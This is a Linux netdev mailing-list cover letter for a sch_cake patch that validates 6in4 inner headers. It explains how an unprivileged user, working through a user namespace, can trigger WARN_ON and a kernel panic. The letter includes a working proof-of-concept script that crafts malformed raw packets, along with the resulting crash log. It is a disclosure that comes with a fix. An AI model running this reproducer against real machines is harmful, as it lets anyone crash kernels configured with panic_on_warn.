From mboxrd@z Thu Jan 1 00:00:00 1970 Authentication-Results: mail.toke.dk; dkim=pass header.d=gmail.com header.i=@gmail.com header.a=rsa-sha256 header.s=20251104 header.b=FZ+fJby7; arc=none (Message is not ARC signed); dmarc=pass (Used From Domain Record) header.from=gmail.com policy.dmarc=quarantine Received: from mail-pg1-x52b.google.com (mail-pg1-x52b.google.com [IPv6:2607:f8b0:4864:20::52b]) by mail.toke.dk (Postfix) with ESMTPS id A0A4E13CAFC0 for ; Mon, 27 Jul 2026 19:03:52 +0200 (CEST) Received: by mail-pg1-x52b.google.com with SMTP id 41be03b00d2f7-c9aea40d799so1516488a12.0 for ; Mon, 27 Jul 2026 10:03:52 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20251104; t=1785171830; x=1785776630; darn=lists.bufferbloat.net; h=content-transfer-encoding:mime-version:message-id:date:subject:cc :to:from:from:to:cc:subject:date:message-id:reply-to:content-type; bh=v7mGTmbWvHoeQ9h7R/0N4ykTmt2GYD/jipEnmXPYUH8=; b=FZ+fJby7f0nxpWnU9VCV94I5sToJSOPErZnH9bsVvo/SMtFcpYoGpFUZfb14bk3Rgq fuV/xqsDxW1Y7hULuktpyQL+KIP4SYAvad5yiM25VFynn03Th3SttAgfpqRxpWFgooDf 7VPs55VHYqEKIOeyT05wNC8ZdaOEWmmSxJUVPxbX1pM7XMUZCdrqcYX7gIbtT3RFTliK yOpBux8SeOJt2J3bmh1VVuBHRXju6t3A3MF/SNVjCuCqMGVByqO6njO4XFjJwpWTUoh4 wWJSaNk97UjsuG6COWLK6mgmhmepJSB4XLOFi5O5gSrW7xZsDPE1hqpxFV1VvVMVrV1k idfA== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20251104; t=1785171830; x=1785776630; h=content-transfer-encoding:mime-version:message-id:date:subject:cc :to:from:x-gm-gg:x-gm-message-state:from:to:cc:subject:date :message-id:reply-to:content-type; bh=v7mGTmbWvHoeQ9h7R/0N4ykTmt2GYD/jipEnmXPYUH8=; b=EY5xHForKRAOu1AofxsVfMo3T6AY9lDlQd50u1X0+a1WbmVudAxVM6rIaSMo+7Puhi 0dF6fNpzvIdQAE6KTQWceidY4c42NmVZoETeBSZUGp41eW3+prYs08IvH6mpFu17RXus GQlI0hmd8OvMU4X0fQAMEtg027IVe9Xr+81uelXznw1n2oQKllPCiSegc1PbelrXPMsq v/1JpbOe+ziZH+8+cysvF3QvPxVDAdP9mqYkolAkxLNV9wuf60Mg+aD0aLoUYtJAV2l+ eQ18uwNbrcZuZhIjAYKOqiu+R3Vi+nbqoMpMRG8Xy2MEAJbSKFoCL9OMufKejKLT2wc9 w6KA== X-Gm-Message-State: AOJu0Yxkrn1PI7ryy2D0n4ig67SNIcNvY4h82MCNlkwrMwGBVijUPody 5jJB5JgtSDAPrHv3CG3fcptfC2kHXUb1QAAZiVUfZf9UdPGsSOkJqIHJKgzBdRZJMWs= X-Gm-Gg: AR+sD13Pf6UDlgbhrCiTSkAfq2QIJJ2nlrZit2IcaQuPFgl6trFoV+OAZByJ3bTQf7Y DtqJRzH+7xNkUemErHYnM0wRVVfIe2kwytfOfmeEslpL4nx8DC32ZtJ3t17cSxeKuDsoRZ4tgsk Se9XV2cQAglauMg+9KdzZgdLlGP8chQlyFpEbg4c7eVsO44WghbWKonFqsz9zEj1L18e8XbAMXZ MLHD+oNy+qENtHox2XPDRXt5/+mCr57qNJ+p1Z/BWPMTnMIDEhkR+uxi+uuhy555gD2D/aTCsin 4b20U1Zr5IVpRIEmv2r2hXueFMUXbc4nJAE+mTfgdrnn3oo3iwF19BqrzRCEqM7DOoYhSNbOx3w f3K3YsVEK+ju8bnkZZyN3mbWYIGo9fDhhlzQkZaM9D//Jx5R1wvl3k3pk1bLXpbx0f61cCr+1WL l5A4syeHEEqsUM3D1HowUFxLdEq9yvEkrVZIiMcoQWkfmFvOSHC2XodXO48m6dPzKtzax/4RqFf 37ZesM= X-Received: by 2002:a05:6a21:99a6:b0:3c3:7dfd:22c6 with SMTP id adf61e73a8af0-3c67e0b9e3emr8423919637.73.1785171829788; Mon, 27 Jul 2026 10:03:49 -0700 (PDT) Received: from enjou-Legion-Y7000P-2019 ([219.141.235.82]) by smtp.gmail.com with ESMTPSA id 41be03b00d2f7-cbbb66e0ccdsm3546131a12.32.2026.07.27.10.03.46 (version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256); Mon, 27 Jul 2026 10:03:49 -0700 (PDT) From: Ren Wei To: cake@lists.bufferbloat.net, netdev@vger.kernel.org Cc: toke@toke.dk, jhs@mojatatu.com, jiri@resnulli.us, davem@davemloft.net, edumazet@google.com, pabeni@redhat.com, horms@kernel.org, vega@nebusec.ai, zhilinz@nebusec.ai, enjou1224z@gmail.com Date: Tue, 28 Jul 2026 01:03:40 +0800 Message-ID: X-Mailer: git-send-email 2.51.0 MIME-Version: 1.0 Content-Transfer-Encoding: 8bit X-MailFrom: enjou1224z@gmail.com X-Mailman-Rule-Hits: nonmember-moderation X-Mailman-Rule-Misses: dmarc-mitigation; no-senders; approved; loop; banned-address; emergency; member-moderation Message-ID-Hash: SAVS7CJ32L7ANRZ67QS4VQ5IS5PZJXTL X-Message-ID-Hash: SAVS7CJ32L7ANRZ67QS4VQ5IS5PZJXTL X-Mailman-Approved-At: Tue, 28 Jul 2026 10:39:55 +0200 X-Mailman-Version: 3.3.10 Precedence: list Subject: [Cake] [PATCH net 0/1] net/sched: sch_cake: validate 6in4 inner headers List-Id: Cake - FQ_codel the next generation Archived-At: List-Archive: List-Help: List-Owner: List-Post: List-Subscribe: List-Unsubscribe: From: Zhiling Zou Hi Linux kernel maintainers, We found and validated an issue in net/sched/sch_cake.c. The bug is reachable by a non-root user via user and net namespace when CAKE is configured with ACK filtering. We've tested it, and it should not affect any other functionality. We will provide detailed information about the bug in this email, along with a PoC to trigger it. ---- details below ---- Bug details: CAKE's ACK filter parses TCP headers from IPv4, IPv6 and 6in4 packets. For IPv4 packets with protocol 41, cake_get_tcphdr() treats the bytes after the outer IPv4 header as an IPv6 header if the inner nexthdr byte is TCP. cake_get_iphdr() likewise returns that inner header to the ACK filter. Neither helper verifies that the encapsulated header actually has IPv6 version 6. The reproducer sets the first inner-header byte to 0x05, which makes the IPv6 version field 0 while still setting the nexthdr byte to TCP. Once two packets from the same flow are queued, cake_ack_filter() compares their IP headers and reaches the version switch that only handles IPv4 and IPv6. The malformed inner version then hits WARN_ON(1), which panics kernels booted with panic_on_warn=1. The fix rejects 6in4 packets unless the encapsulated header has IPv6 version 6 in both the IP-header and TCP-header parsing helpers. Reproducer: unshare -Urn ./poc.sh We run the PoC in a 2 vCPU, 2 GB RAM x86 QEMU environment. ------BEGIN poc.sh------ #!/bin/sh set -eu export PATH=/usr/sbin:/usr/bin:/sbin:/bin IFACE="${IFACE:-veth0}" PEER="${PEER:-veth1}" COUNT="${COUNT:-20}" RATE="${RATE:-1kbit}" ip link add "$IFACE" type veth peer name "$PEER" ip link set lo up ip link set "$IFACE" up ip link set "$PEER" up tc qdisc add dev "$IFACE" root cake bandwidth "$RATE" flowblind ack-filter python3 - "$IFACE" "$PEER" "$COUNT" <<'PY' import fcntl import socket import struct import sys iface, peer, count = sys.argv[1], sys.argv[2], int(sys.argv[3]) def csum(data): if len(data) & 1: data += b"\x00" total = 0 for i in range(0, len(data), 2): total += (data[i] << 8) + data[i + 1] while total >> 16: total = (total & 0xffff) + (total >> 16) return (~total) & 0xffff def mac(name): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) ifreq = struct.pack("16sH14s", name.encode(), socket.AF_UNIX, b"" * 14) res = fcntl.ioctl(s.fileno(), 0x8927, ifreq) return res[18:24] src = mac(iface) dst = mac(peer) eth = dst + src + struct.pack("!H", 0x0800) outer_wo = struct.pack( "!BBHHHBBH4s4s", 0x45, 0, 80, 0x1234, 0, 64, 41, 0, socket.inet_aton("192.0.2.1"), socket.inet_aton("192.0.2.2"), ) outer = outer_wo[:10] + struct.pack("!H", csum(outer_wo)) + outer_wo[12:] inner = bytearray(40) inner[0] = 0x05 inner[6] = 6 inner[8:24] = bytes.fromhex("20010db8000000000000000000000001") inner[24:40] = bytes.fromhex("20010db8000000000000000000000002") tcp = bytearray(20) struct.pack_into("!HHII", tcp, 0, 10000, 20000, 0, 1) tcp[12] = 5 << 4 tcp[13] = 0x10 pkt = eth + outer + inner + tcp s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW) s.bind((iface, 0)) for _ in range(count): s.send(pkt) print(f"sent {len(pkt)} bytes x {count}") PY ------END poc.sh-------- ----BEGIN crash log---- [ 342.881985][T10039] Kernel panic - not syncing: kernel: panic_on_warn set ... [ 342.882788][T10039] CPU: 0 UID: 1028 PID: 10039 Comm: python3 Tainted: G W 7.1.0-rc1 #2 PREEMPT(full) [ 342.883469][T10039] Tainted: [W]=WARN [ 342.883722][T10039] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 [ 342.884395][T10039] Call Trace: [ 342.884604][T10039] [ 342.884805][T10039] vpanic (/home/roxy/linux-block-patch/build/../kernel/panic.c:734) [ 342.885074][T10039] ? __pfx_vpanic (/home/roxy/linux-block-patch/build/../kernel/panic.c:361) [ 342.885373][T10039] ? cake_ack_filter.isra.0 (/home/roxy/linux-block-patch/build/../net/sched/sch_cake.c:1171 /home/roxy/linux-block-patch/build/../net/sched/sch_cake.c:1305) [ 342.885732][T10039] panic (/home/roxy/linux-block-patch/build/../kernel/panic.c:787) [ 342.885975][T10039] ? __pfx_panic (/home/roxy/linux-block-patch/build/../kernel/panic.c:740) [ 342.886279][T10039] check_panic_on_warn (/home/roxy/linux-block-patch/build/../kernel/panic.c:527 (discriminator 1)) [ 342.886599][T10039] __warn (/home/roxy/linux-block-patch/build/../kernel/panic.c:1101) [ 342.886847][T10039] ? cake_ack_filter.isra.0 (/home/roxy/linux-block-patch/build/../net/sched/sch_cake.c:1171 /home/roxy/linux-block-patch/build/../net/sched/sch_cake.c:1305) [ 342.887202][T10039] __report_bug (/home/roxy/linux-block-patch/build/../lib/bug.c:204 (discriminator 1)) [ 342.887502][T10039] ? __pfx___report_bug (/home/roxy/linux-block-patch/build/../lib/bug.c:73 (discriminator 5)) [ 342.887834][T10039] ? srso_alias_return_thunk (/home/roxy/linux-block-patch/build/../arch/x86/lib/retpoline.S:220) [ 342.888189][T10039] ? __lock_acquire (/home/roxy/linux-block-patch/build/../kernel/locking/lockdep.c:4674 /home/roxy/linux-block-patch/build/../kernel/locking/lockdep.c:5191) [ 342.888506][T10039] ? srso_alias_return_thunk (/home/roxy/linux-block-patch/build/../arch/x86/lib/retpoline.S:220) [ 342.888872][T10039] ? cake_ack_filter.isra.0 (/home/roxy/linux-block-patch/build/../net/sched/sch_cake.c:1171 /home/roxy/linux-block-patch/build/../net/sched/sch_cake.c:1305) [ 342.889228][T10039] report_bug (/home/roxy/linux-block-patch/build/../include/linux/context_tracking.h:149 (discriminator 1) /home/roxy/linux-block-patch/build/../lib/bug.c:277 (discriminator 1)) [ 342.889497][T10039] ? cake_ack_filter.isra.0 (/home/roxy/linux-block-patch/build/../net/sched/sch_cake.c:1171 /home/roxy/linux-block-patch/build/../net/sched/sch_cake.c:1305) [ 342.889867][T10039] handle_bug (/home/roxy/linux-block-patch/build/../arch/x86/kernel/traps.c:436) [ 342.890147][T10039] exc_invalid_op (/home/roxy/linux-block-patch/build/../arch/x86/kernel/traps.c:490 (discriminator 1)) [ 342.890439][T10039] asm_exc_invalid_op (/home/roxy/linux-block-patch/build/../arch/x86/include/asm/idtentry.h:616) [ 342.890749][T10039] RIP: 0010:cake_ack_filter.isra.0 (/home/roxy/linux-block-patch/build/../net/sched/sch_cake.c:1171 /home/roxy/linux-block-patch/build/../net/sched/sch_cake.c:1305) [ 342.891138][T10039] Code: 00 00 65 48 2b 05 d5 46 40 0a 0f 85 3d 0a 00 00 48 81 c4 a8 02 00 00 4c 89 d8 5b 5d 41 5c 41 5d 41 5e 41 5f e9 b9 77 3b f8 90 <0f> 0b 90 e9 be f7 ff ff 48 8b 45 10 49 39 45 10 0f 85 b0 f7 ff ff All code ======== 0: 00 00 add %al,(%rax) 2: 65 48 2b 05 d5 46 40 sub %gs:0xa4046d5(%rip),%rax # 0xa4046df 9: 0a a: 0f 85 3d 0a 00 00 jne 0xa4d 10: 48 81 c4 a8 02 00 00 add $0x2a8,%rsp 17: 4c 89 d8 mov %r11,%rax 1a: 5b pop %rbx 1b: 5d pop %rbp 1c: 41 5c pop %r12 1e: 41 5d pop %r13 20: 41 5e pop %r14 22: 41 5f pop %r15 24: e9 b9 77 3b f8 jmp 0xfffffffff83b77e2 29: 90 nop 2a:* 0f 0b ud2 <-- trapping instruction 2c: 90 nop 2d: e9 be f7 ff ff jmp 0xfffffffffffff7f0 32: 48 8b 45 10 mov 0x10(%rbp),%rax 36: 49 39 45 10 cmp %rax,0x10(%r13) 3a: 0f 85 b0 f7 ff ff jne 0xfffffffffffff7f0 Code starting with the faulting instruction =========================================== 0: 0f 0b ud2 2: 90 nop 3: e9 be f7 ff ff jmp 0xfffffffffffff7c6 8: 48 8b 45 10 mov 0x10(%rbp),%rax c: 49 39 45 10 cmp %rax,0x10(%r13) 10: 0f 85 b0 f7 ff ff jne 0xfffffffffffff7c6 [ 342.892336][T10039] RSP: 0018:ffa0000011727410 EFLAGS: 00010287 [ 342.892725][T10039] RAX: 0000000000000000 RBX: ff110000701ab50c RCX: 0000000000000000 [ 342.893225][T10039] RDX: 0000000000000007 RSI: ff110000701ab8cc RDI: 0000000000000004 [ 342.893726][T10039] RBP: ff110000701ab8a4 R08: ffa0000011727328 R09: 0000000000000000 [ 342.894211][T10039] R10: 0000000000000000 R11: 0000000000000000 R12: ff110001138a8c80 [ 342.894710][T10039] R13: ff110000701ab4e4 R14: 00000000204e1027 R15: dffffc0000000000 [ 342.895265][T10039] ? srso_alias_return_thunk (/home/roxy/linux-block-patch/build/../arch/x86/lib/retpoline.S:220) [ 342.895629][T10039] ? __pfx_cake_ack_filter.isra.0 (/home/roxy/linux-block-patch/build/../net/sched/sch_cake.c:2812) [ 342.896028][T10039] ? srso_alias_return_thunk (/home/roxy/linux-block-patch/build/../arch/x86/lib/retpoline.S:220) [ 342.896377][T10039] ? __lock_acquire (/home/roxy/linux-block-patch/build/../kernel/locking/lockdep.c:4674 /home/roxy/linux-block-patch/build/../kernel/locking/lockdep.c:5191) [ 342.896704][T10039] ? srso_alias_return_thunk (/home/roxy/linux-block-patch/build/../arch/x86/lib/retpoline.S:220) [ 342.897051][T10039] ? cake_overhead (/home/roxy/linux-block-patch/build/../net/sched/sch_cake.c:1451) [ 342.897363][T10039] ? __pfx_cake_overhead (/home/roxy/linux-block-patch/build/../include/linux/skbuff.h:3253 (discriminator 1)) [ 342.897699][T10039] ? ktime_get (/home/roxy/linux-block-patch/build/../kernel/time/timekeeping.c:969 (discriminator 2)) [ 342.897978][T10039] ? srso_alias_return_thunk (/home/roxy/linux-block-patch/build/../arch/x86/lib/retpoline.S:220) [ 342.898335][T10039] ? srso_alias_return_thunk (/home/roxy/linux-block-patch/build/../arch/x86/lib/retpoline.S:220) [ 342.898706][T10039] cake_enqueue (/home/roxy/linux-block-patch/build/../net/sched/sch_cake.c:1823 (discriminator 2)) [ 342.899004][T10039] ? srso_alias_return_thunk (/home/roxy/linux-block-patch/build/../arch/x86/lib/retpoline.S:220) [ 342.899355][T10039] ? __lock_acquire (/home/roxy/linux-block-patch/build/../kernel/locking/lockdep.c:4674 /home/roxy/linux-block-patch/build/../kernel/locking/lockdep.c:5191) [ 342.899700][T10039] ? __pfx_cake_enqueue (/home/roxy/linux-block-patch/build/../include/linux/skbuff.h:1724) [ 342.900033][T10039] __dev_queue_xmit (/home/roxy/linux-block-patch/build/../include/net/sch_generic.h:949 (discriminator 1) /home/roxy/linux-block-patch/build/../net/core/dev.c:4208 (discriminator 1) /home/roxy/linux-block-patch/build/../net/core/dev.c:4831 (discriminator 1)) [ 342.900376][T10039] ? __pfx___dev_queue_xmit (/home/roxy/linux-block-patch/build/../include/linux/netdevice.h:4010 (discriminator 1)) [ 342.900728][T10039] ? srso_alias_return_thunk (/home/roxy/linux-block-patch/build/../arch/x86/lib/retpoline.S:220) [ 342.901079][T10039] ? _copy_from_iter (/home/roxy/linux-block-patch/build/../include/linux/iov_iter.h:296 /home/roxy/linux-block-patch/build/../include/linux/iov_iter.h:330 /home/roxy/linux-block-patch/build/../lib/iov_iter.c:261 /home/roxy/linux-block-patch/build/../lib/iov_iter.c:272) [ 342.901403][T10039] ? srso_alias_return_thunk (/home/roxy/linux-block-patch/build/../arch/x86/lib/retpoline.S:220) [ 342.901762][T10039] ? lock_acquire (/home/roxy/linux-block-patch/build/../kernel/locking/lockdep.c:5868 /home/roxy/linux-block-patch/build/../kernel/locking/lockdep.c:5825) [ 342.902063][T10039] ? srso_alias_return_thunk (/home/roxy/linux-block-patch/build/../arch/x86/lib/retpoline.S:220) [ 342.902417][T10039] ? find_held_lock (/home/roxy/linux-block-patch/build/../kernel/locking/lockdep.c:5350) [ 342.902723][T10039] ? __pfx__copy_from_iter (/home/roxy/linux-block-patch/build/../include/linux/iov_iter.h:157) [ 342.903075][T10039] ? srso_alias_return_thunk (/home/roxy/linux-block-patch/build/../arch/x86/lib/retpoline.S:220) [ 342.903427][T10039] ? packet_parse_headers (/home/roxy/linux-block-patch/build/../include/linux/netdevice.h:3492 /home/roxy/linux-block-patch/build/../net/packet/af_packet.c:1930) [ 342.903781][T10039] ? __pfx_packet_parse_headers (/home/roxy/linux-block-patch/build/../include/net/dst.h:285) [ 342.904143][T10039] ? skb_copy_datagram_from_iter (/home/roxy/linux-block-patch/build/../arch/x86/include/asm/jump_label.h:37 /home/roxy/linux-block-patch/build/../include/linux/ucopysize.h:20 /home/roxy/linux-block-patch/build/../include/linux/ucopysize.h:59 /home/roxy/linux-block-patch/build/../include/linux/uio.h:227 /home/roxy/linux-block-patch/build/../net/core/datagram.c:561) [ 342.904532][T10039] packet_sendmsg (/home/roxy/linux-block-patch/build/../include/linux/skbuff.h:3137 (discriminator 1) /home/roxy/linux-block-patch/build/../net/packet/af_packet.c:3030 (discriminator 1) /home/roxy/linux-block-patch/build/../net/packet/af_packet.c:3114 (discriminator 1)) [ 342.904880][T10039] ? srso_alias_return_thunk (/home/roxy/linux-block-patch/build/../arch/x86/lib/retpoline.S:220) [ 342.905241][T10039] ? __pfx___might_resched (/home/roxy/linux-block-patch/build/../kernel/sched/core.c:5888 (discriminator 7)) [ 342.905581][T10039] ? srso_alias_return_thunk (/home/roxy/linux-block-patch/build/../arch/x86/lib/retpoline.S:220) [ 342.905946][T10039] ? __lock_acquire (/home/roxy/linux-block-patch/build/../kernel/locking/lockdep.c:4674 /home/roxy/linux-block-patch/build/../kernel/locking/lockdep.c:5191) [ 342.906270][T10039] ? __pfx_packet_sendmsg (/home/roxy/linux-block-patch/build/../arch/x86/include/asm/atomic.h:23) [ 342.906608][T10039] ? __pfx_aa_sk_perm+0x10/0x10 [ 342.906951][T10039] __sys_sendto (/home/roxy/linux-block-patch/build/../net/socket.c:787 (discriminator 2) /home/roxy/linux-block-patch/build/../net/socket.c:802 (discriminator 2) /home/roxy/linux-block-patch/build/../net/socket.c:2265 (discriminator 2)) [ 342.907241][T10039] ? __pfx___sys_sendto (/home/roxy/linux-block-patch/build/../net/socket.c:2219) [ 342.907558][T10039] ? __local_bh_enable_ip (/home/roxy/linux-block-patch/build/../kernel/softirq.c:457 (discriminator 1)) [ 342.907905][T10039] ? srso_alias_return_thunk (/home/roxy/linux-block-patch/build/../arch/x86/lib/retpoline.S:220) [ 342.908263][T10039] ? lockdep_hardirqs_on (/home/roxy/linux-block-patch/build/../kernel/locking/lockdep.c:4472) [ 342.908605][T10039] ? srso_alias_return_thunk (/home/roxy/linux-block-patch/build/../arch/x86/lib/retpoline.S:220) [ 342.908964][T10039] ? __sys_bind (/home/roxy/linux-block-patch/build/../net/socket.c:1933 (discriminator 2) /home/roxy/linux-block-patch/build/../net/socket.c:1925 (discriminator 2) /home/roxy/linux-block-patch/build/../net/socket.c:1964 (discriminator 2)) [ 342.909293][T10039] __x64_sys_sendto (/home/roxy/linux-block-patch/build/../net/socket.c:2272 /home/roxy/linux-block-patch/build/../net/socket.c:2268 /home/roxy/linux-block-patch/build/../net/socket.c:2268) [ 342.909599][T10039] ? do_syscall_64 (/home/roxy/linux-block-patch/build/../include/linux/entry-common.h:177 /home/roxy/linux-block-patch/build/../arch/x86/entry/syscall_64.c:89) [ 342.909909][T10039] ? srso_alias_return_thunk (/home/roxy/linux-block-patch/build/../arch/x86/lib/retpoline.S:220) [ 342.910264][T10039] ? lockdep_hardirqs_on (/home/roxy/linux-block-patch/build/../kernel/locking/lockdep.c:4472) [ 342.910593][T10039] do_syscall_64 (/home/roxy/linux-block-patch/build/../arch/x86/entry/syscall_64.c:63 /home/roxy/linux-block-patch/build/../arch/x86/entry/syscall_64.c:94) [ 342.910889][T10039] ? irqentry_exit (/home/roxy/linux-block-patch/build/../include/linux/irq-entry-common.h:280 /home/roxy/linux-block-patch/build/../include/linux/irq-entry-common.h:325 /home/roxy/linux-block-patch/build/../kernel/entry/common.c:162) [ 342.911194][T10039] entry_SYSCALL_64_after_hwframe (/home/roxy/linux-block-patch/build/../arch/x86/entry/entry_64.S:121) [ 342.911566][T10039] RIP: 0033:0x7f6d385c0687 [ 342.911854][T10039] Code: 48 89 fa 4c 89 df e8 58 b3 00 00 8b 93 08 03 00 00 59 5e 48 83 f8 fc 74 1a 5b c3 0f 1f 84 00 00 00 00 00 48 8b 44 24 10 0f 05 <5b> c3 0f 1f 80 00 00 00 00 83 e2 39 83 fa 08 75 de e8 23 ff ff ff All code ======== 0: 48 89 fa mov %rdi,%rdx 3: 4c 89 df mov %r11,%rdi 6: e8 58 b3 00 00 call 0xb363 b: 8b 93 08 03 00 00 mov 0x308(%rbx),%edx 11: 59 pop %rcx 12: 5e pop %rsi 13: 48 83 f8 fc cmp $0xfffffffffffffffc,%rax 17: 74 1a je 0x33 19: 5b pop %rbx 1a: c3 ret 1b: 0f 1f 84 00 00 00 00 nopl 0x0(%rax,%rax,1) 22: 00 23: 48 8b 44 24 10 mov 0x10(%rsp),%rax 28: 0f 05 syscall 2a:* 5b pop %rbx <-- trapping instruction 2b: c3 ret 2c: 0f 1f 80 00 00 00 00 nopl 0x0(%rax) 33: 83 e2 39 and $0x39,%edx 36: 83 fa 08 cmp $0x8,%edx 39: 75 de jne 0x19 3b: e8 23 ff ff ff call 0xffffffffffffff63 Code starting with the faulting instruction =========================================== 0: 5b pop %rbx 1: c3 ret 2: 0f 1f 80 00 00 00 00 nopl 0x0(%rax) 9: 83 e2 39 and $0x39,%edx c: 83 fa 08 cmp $0x8,%edx f: 75 de jne 0xffffffffffffffef 11: e8 23 ff ff ff call 0xffffffffffffff39 [ 342.913048][T10039] RSP: 002b:00007ffd3b5faa90 EFLAGS: 00000202 ORIG_RAX: 000000000000002c [ 342.913567][T10039] RAX: ffffffffffffffda RBX: 00007f6d3852c780 RCX: 00007f6d385c0687 [ 342.914072][T10039] RDX: 000000000000005e RSI: 00007f6d380334d0 RDI: 0000000000000003 [ 342.914561][T10039] RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000 [ 342.915058][T10039] R10: 0000000000000000 R11: 0000000000000202 R12: 0000000000000000 [ 342.915554][T10039] R13: 0000000000000000 R14: 00000000006ff020 R15: 0000000000a83590 [ 342.916081][T10039] [ 342.916721][T10039] Kernel Offset: disabled [ 342.917019][T10039] Rebooting in 86400 seconds.. -----END crash log----- Best regards, Zhiling Zou Zhiling Zou (1): net/sched: sch_cake: validate 6in4 inner headers net/sched/sch_cake.c | 18 +++++++++++------- 1 file changed, 11 insertions(+), 7 deletions(-) -- 2.43.0